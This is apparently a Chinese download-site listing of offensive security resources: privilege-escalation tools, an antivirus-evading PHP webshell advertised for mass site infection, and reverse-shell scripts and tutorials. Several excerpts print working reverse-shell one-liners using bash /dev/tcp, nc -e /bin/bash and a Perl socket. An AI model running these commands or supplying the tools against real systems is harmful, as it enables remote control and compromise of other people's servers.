您好,欢迎光临本网站![请登录][注册会员]  

搜索资源列表

  1. 提权三神器

  2. Churrasco.exe(windows2k3本地漏洞提升system权限)nc.exe反弹shell利器 cmd.exe命令提示符(将此程序传入webshell的一个可写目录)
  3. 所属分类:网络攻防

    • 发布日期:2013-08-10
    • 文件大小:166912
    • 提供者:milantgh
  1. 2016年最新免杀大马,php过狗木马(未加密升级版本)

  2. 本软件无毒无后门,明码未加密,代码一目了然! 本代码用于测试学习,请勿用于非法攻击! 下载后可以自己使用抓包软件测试! 批量挂马:输入自己的代码,就可以挂入站里所有文件 环境变量:测试服务器环境与服务器支持设置 在线代理:可以直接在WEBSHELL上代理连接其它网址 注册表操作:可直接操作注册表与查看3389端口 WEBSHELL:以各种权限运行CMD命令 杂项破解:可以破解各种密码! 解压mix.dll:某些命令操作需要mix.dll内带的函数 http文件下载:可以直接从你自己的网址下载文
  3. 所属分类:网络安全

  1. python反向连接shell,可穿透防火墙

  2. python reverse_shell.py 反弹目的ip 3322 反弹目的ip 执行nc -l 3322 即可连结 被控端
  3. 所属分类:Python

    • 发布日期:2018-07-30
    • 文件大小:2048
    • 提供者:u010237396
  1. nc.exe 网络工具

  2. nc.exe工具,可以用来反弹shell,exe只支持windows中使用,Linux中有的自动安装了nc工具,和windows中用法一样。
  3. 所属分类:网络监控

    • 发布日期:2020-01-06
    • 文件大小:28672
    • 提供者:TryTaTryTa
  1. 不一样的视角剖析Linux 反弹shell水印版.pdf

  2. 本文的标题是"不一样的视角"剖析linux反弹shell,,和业界普遍的视角是不同的,我把它划分更细了。为啥这么做呢?说一下写这篇文章的初衷,一般反弹shell咱们根 据是否是常驻shel划分为交互式与非交互式两种。我个人认为太笼统了,比如bash-i, nc -e /bin/bash, pty , socat都是交互式反弹shell,但是他们本身有很大的不同。单拿bash -i和nc -e /bin/bash来说,都是弹bash,为啥- -个加-i,- -个不加,他们有什么不同,统称为交互式,
  3. 所属分类:网络安全

    • 发布日期:2020-08-02
    • 文件大小:899072
    • 提供者:weixin_43510203
  1. Linux下NC反弹shell命令(推荐)

  2. 主要介绍了Linux下NC反弹shell命令,非常不错,具有参考借鉴价值,需要的的朋友参考下吧
  3. 所属分类:其它

    • 发布日期:2020-09-15
    • 文件大小:30720
    • 提供者:weixin_38543280
  1. windows中nc使用

  2. windows中nc使用方法,实现windows接受shell,看了这个文档就很容易使用NC命令去接受反弹的shell
  3. 所属分类:网络攻防

    • 发布日期:2020-09-23
    • 文件大小:28672
    • 提供者:qq_39970168
  1. [小白/详细]AC2100刷机教程&开启telnet失败&刷Breed----各类问题解决方案

  2. ‘nc.exe'不是内部或外部命令,也不是可运行的程序 或批处理文件。 8081端口被占用请检查 请按任意键继续.. 开启PPPOE服务器失败,终端最后一行出现  ‘type...error’之类的 Task_反弹shell无法粘贴 Task_PPPOE服务器一直出现请求回复的异常 1)刷写breed命令等待过长,无反应 2)telnet 192.168.31.1-无效
  3. 所属分类:电信

    • 发布日期:2020-10-24
    • 文件大小:141557760
    • 提供者:liao1049164366
  1. 详解NC反弹shell的几种方法

  2. 假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1:bash反弹
  3. 所属分类:其它

    • 发布日期:2021-01-08
    • 文件大小:36864
    • 提供者:weixin_38664159
  1. linux反弹shell的原理详解

  2. 完整命令 反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一个交互式的bash &是为了区分文件1和文件描述符1的 a>&b 的
  3. 所属分类:其它

    • 发布日期:2021-01-08
    • 文件大小:516096
    • 提供者:weixin_38638312
  1. linux反弹shell的原理详解

  2. 完整命令 反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一个交互式的bash &是为了区分文件1和文件描述符1的 a>&b 的
  3. 所属分类:其它

    • 发布日期:2021-01-08
    • 文件大小:516096
    • 提供者:weixin_38714637
  1. Linux下NC反弹shell命令(推荐)

  2. 本机开启监听: nc -lvnp 4444 nc -vvlp 4444 目标机器开启反弹 bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 perl版本: perl -e 'use Socket;$i=10.0.0.1;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(tcp));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(S
  3. 所属分类:其它

    • 发布日期:2021-01-20
    • 文件大小:32768
    • 提供者:weixin_38653691